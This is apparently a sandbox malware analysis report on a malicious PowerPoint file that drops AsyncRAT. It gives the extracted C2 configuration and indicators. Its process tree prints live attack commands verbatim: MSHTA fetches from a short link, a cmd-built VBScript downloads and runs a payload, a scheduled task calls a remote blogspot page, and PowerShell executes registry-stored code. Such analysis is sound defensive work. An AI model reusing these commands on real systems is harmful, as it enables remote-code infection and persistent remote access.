Analysis

  • max time kernel
    94s
  • max time network
    139s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    05-03-2021 10:01

General

  • Target

    sample.ppt

  • Size

    224KB

  • MD5

    f93b770274956fb4b09e4962a45c32da

  • SHA1

    8e295f26e68ea595aaee521db9d29d39425ffbb1

  • SHA256

    56dd6d0c5eacf5a7ec7233c4acb4cf97df95f66ed5d4d4880dca62f6b4b27a69

  • SHA512

    98856b284df590ec1bf8e4edeab529315a3115a9f7d1a277328fa6ad4fcf25fa120b814a5714148df05386ff4d738523b3bec1617745631a766efab5cf95ced0

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

micomico.ddns.net:4000

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    xHd6d9DzQMkRsJZC7bi0eTRsEMK6w0Yc

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    2021comecou@$gringoooooobrabao

  • host

    micomico.ddns.net

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    4000

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 15 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\sample.ppt" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\SYSTEM32\MSHTA.exe
      MSHTA http://12384928198391823%12384928198391823@j.mp/dokdwkkwkdwkxxxdcjcdkwk
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2272
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\FIX.VBS", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
        3⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3172
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
          4⤵
          • Blocklisted process makes network request
          PID:1988
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/42.html""\"", 0 : window.close"\")
        3⤵
        • Creates scheduled task(s)
        PID:768
      • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
        "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1348
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
          4⤵
            PID:4760
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
              dw20.exe -x -s 692
              5⤵
                PID:4796
          • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
            "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2416
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im winword.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3212
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3524
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2272 -s 2816
            3⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4196
        • C:\Windows\SYSTEM32\ping.exe
          ping
          2⤵
          • Process spawned unexpected child process
          • Runs ping.exe
          PID:2164
        • C:\Program Files\Microsoft Office\Root\Office16\winword.exe
          winword
          2⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of SetWindowsHookEx
          PID:3208
        • C:\Windows\SYSTEM32\ping.exe
          ping 127.0.0.1
          2⤵
          • Process spawned unexpected child process
          • Runs ping.exe
          PID:4100

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      System Information Discovery

      3
      T1082

      Query Registry

      2
      T1012

      Remote System Discovery

      1
      T1018

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        MD5

        7b619bb67bea8c3e777e6255af672811

        SHA1

        73a0ddab06af144e4b1ce7aa1857c06dec5d8740

        SHA256

        0f7aebca0b8db44ed97560dd716cf88d0d6e3bf7c4561f98354960acd1e1b404

        SHA512

        35e7190ffe8f81042e8588052990ecd28470a438196c3c5e813737af35a7e2a349e82a403680864ebca7527bc5643d95335a3cb612a8c81ad6158d00e0c3293b

      • C:\Users\Public\SiggiaW.vbs
        MD5

        49744d1b597f85a2691eeeccab3f5ec9

        SHA1

        53be659955bdf552d103ddd2251f97920c4830bd

        SHA256

        09af8affea2e91779fc5bd8e45c8eb4274f6cb0fe78cb96c77586f988958fb6f

        SHA512

        7d6036c802670bca691b26e3f22badfce85641354d67d460d38ff26edef248bcc6a51bf81406b11f2b6972525f8af6dfdcc26f298438280d001b03292f767e3f

      • memory/740-2-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmp
        Filesize

        64KB

      • memory/740-5-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmp
        Filesize

        64KB

      • memory/740-6-0x00007FFD6FAE0000-0x00007FFD70117000-memory.dmp
        Filesize

        6.2MB

      • memory/740-4-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmp
        Filesize

        64KB

      • memory/740-3-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmp
        Filesize

        64KB

      • memory/740-39-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmp
        Filesize

        64KB

      • memory/740-38-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmp
        Filesize

        64KB

      • memory/740-37-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmp
        Filesize

        64KB

      • memory/740-36-0x00007FFD4E120000-0x00007FFD4E130000-memory.dmp
        Filesize

        64KB

      • memory/740-27-0x00007FFD70A50000-0x00007FFD7262D000-memory.dmp
        Filesize

        27.9MB

      • memory/768-16-0x0000000000000000-mapping.dmp
      • memory/1348-77-0x000000000ABE0000-0x000000000ABE1000-memory.dmp
        Filesize

        4KB

      • memory/1348-64-0x000000000B840000-0x000000000B841000-memory.dmp
        Filesize

        4KB

      • memory/1348-46-0x0000000008420000-0x0000000008421000-memory.dmp
        Filesize

        4KB

      • memory/1348-44-0x00000000083B0000-0x00000000083B1000-memory.dmp
        Filesize

        4KB

      • memory/1348-84-0x000000000ABE0000-0x000000000ABE3000-memory.dmp
        Filesize

        12KB

      • memory/1348-82-0x000000000ACB0000-0x000000000ACB1000-memory.dmp
        Filesize

        4KB

      • memory/1348-26-0x0000000073F60000-0x000000007464E000-memory.dmp
        Filesize

        6.9MB

      • memory/1348-80-0x000000000B270000-0x000000000B271000-memory.dmp
        Filesize

        4KB

      • memory/1348-79-0x000000007FAB0000-0x000000007FAB1000-memory.dmp
        Filesize

        4KB

      • memory/1348-78-0x000000000B1C0000-0x000000000B1C1000-memory.dmp
        Filesize

        4KB

      • memory/1348-33-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
        Filesize

        4KB

      • memory/1348-56-0x000000000A720000-0x000000000A721000-memory.dmp
        Filesize

        4KB

      • memory/1348-69-0x000000000AC20000-0x000000000AC53000-memory.dmp
        Filesize

        204KB

      • memory/1348-35-0x0000000004EC2000-0x0000000004EC3000-memory.dmp
        Filesize

        4KB

      • memory/1348-67-0x0000000004EC3000-0x0000000004EC4000-memory.dmp
        Filesize

        4KB

      • memory/1348-17-0x0000000000000000-mapping.dmp
      • memory/1348-52-0x0000000008D90000-0x0000000008D91000-memory.dmp
        Filesize

        4KB

      • memory/1348-60-0x000000000A680000-0x000000000A681000-memory.dmp
        Filesize

        4KB

      • memory/1348-58-0x000000000A420000-0x000000000A421000-memory.dmp
        Filesize

        4KB

      • memory/1348-40-0x0000000007920000-0x0000000007921000-memory.dmp
        Filesize

        4KB

      • memory/1988-21-0x0000000000000000-mapping.dmp
      • memory/2164-8-0x0000000000000000-mapping.dmp
      • memory/2272-7-0x0000000000000000-mapping.dmp
      • memory/2416-34-0x00000000066D2000-0x00000000066D3000-memory.dmp
        Filesize

        4KB

      • memory/2416-30-0x0000000006D10000-0x0000000006D11000-memory.dmp
        Filesize

        4KB

      • memory/2416-48-0x0000000007370000-0x0000000007371000-memory.dmp
        Filesize

        4KB

      • memory/2416-54-0x0000000008B60000-0x0000000008B61000-memory.dmp
        Filesize

        4KB

      • memory/2416-42-0x00000000073B0000-0x00000000073B1000-memory.dmp
        Filesize

        4KB

      • memory/2416-25-0x0000000073F60000-0x000000007464E000-memory.dmp
        Filesize

        6.9MB

      • memory/2416-28-0x0000000004570000-0x0000000004571000-memory.dmp
        Filesize

        4KB

      • memory/2416-62-0x0000000009EE0000-0x0000000009EE1000-memory.dmp
        Filesize

        4KB

      • memory/2416-50-0x0000000007DA0000-0x0000000007DA1000-memory.dmp
        Filesize

        4KB

      • memory/2416-66-0x0000000009D80000-0x0000000009D81000-memory.dmp
        Filesize

        4KB

      • memory/2416-18-0x0000000000000000-mapping.dmp
      • memory/2416-32-0x00000000066D0000-0x00000000066D1000-memory.dmp
        Filesize

        4KB

      • memory/3172-15-0x0000000000000000-mapping.dmp
      • memory/3208-14-0x00007FFD6FAE0000-0x00007FFD70117000-memory.dmp
        Filesize

        6.2MB

      • memory/3208-9-0x0000000000000000-mapping.dmp
      • memory/3212-20-0x0000000000000000-mapping.dmp
      • memory/3524-19-0x0000000000000000-mapping.dmp
      • memory/4100-23-0x0000000000000000-mapping.dmp
      • memory/4196-24-0x000001B9AD2F0000-0x000001B9AD2F1000-memory.dmp
        Filesize

        4KB

      • memory/4760-85-0x0000000000400000-0x0000000000412000-memory.dmp
        Filesize

        72KB

      • memory/4760-86-0x000000000040D0AE-mapping.dmp
      • memory/4760-88-0x00000000027D0000-0x00000000027D1000-memory.dmp
        Filesize

        4KB

      • memory/4796-87-0x0000000000000000-mapping.dmp
      • memory/4796-90-0x0000000002970000-0x0000000002971000-memory.dmp
        Filesize

        4KB

      • memory/4796-91-0x0000000002970000-0x0000000002971000-memory.dmp
        Filesize

        4KB

      • memory/4796-92-0x0000000002970000-0x0000000002971000-memory.dmp
        Filesize

        4KB

      • memory/4796-94-0x0000000002970000-0x0000000002971000-memory.dmp
        Filesize

        4KB

      • memory/4796-89-0x00000000024D0000-0x00000000024D1000-memory.dmp
        Filesize

        4KB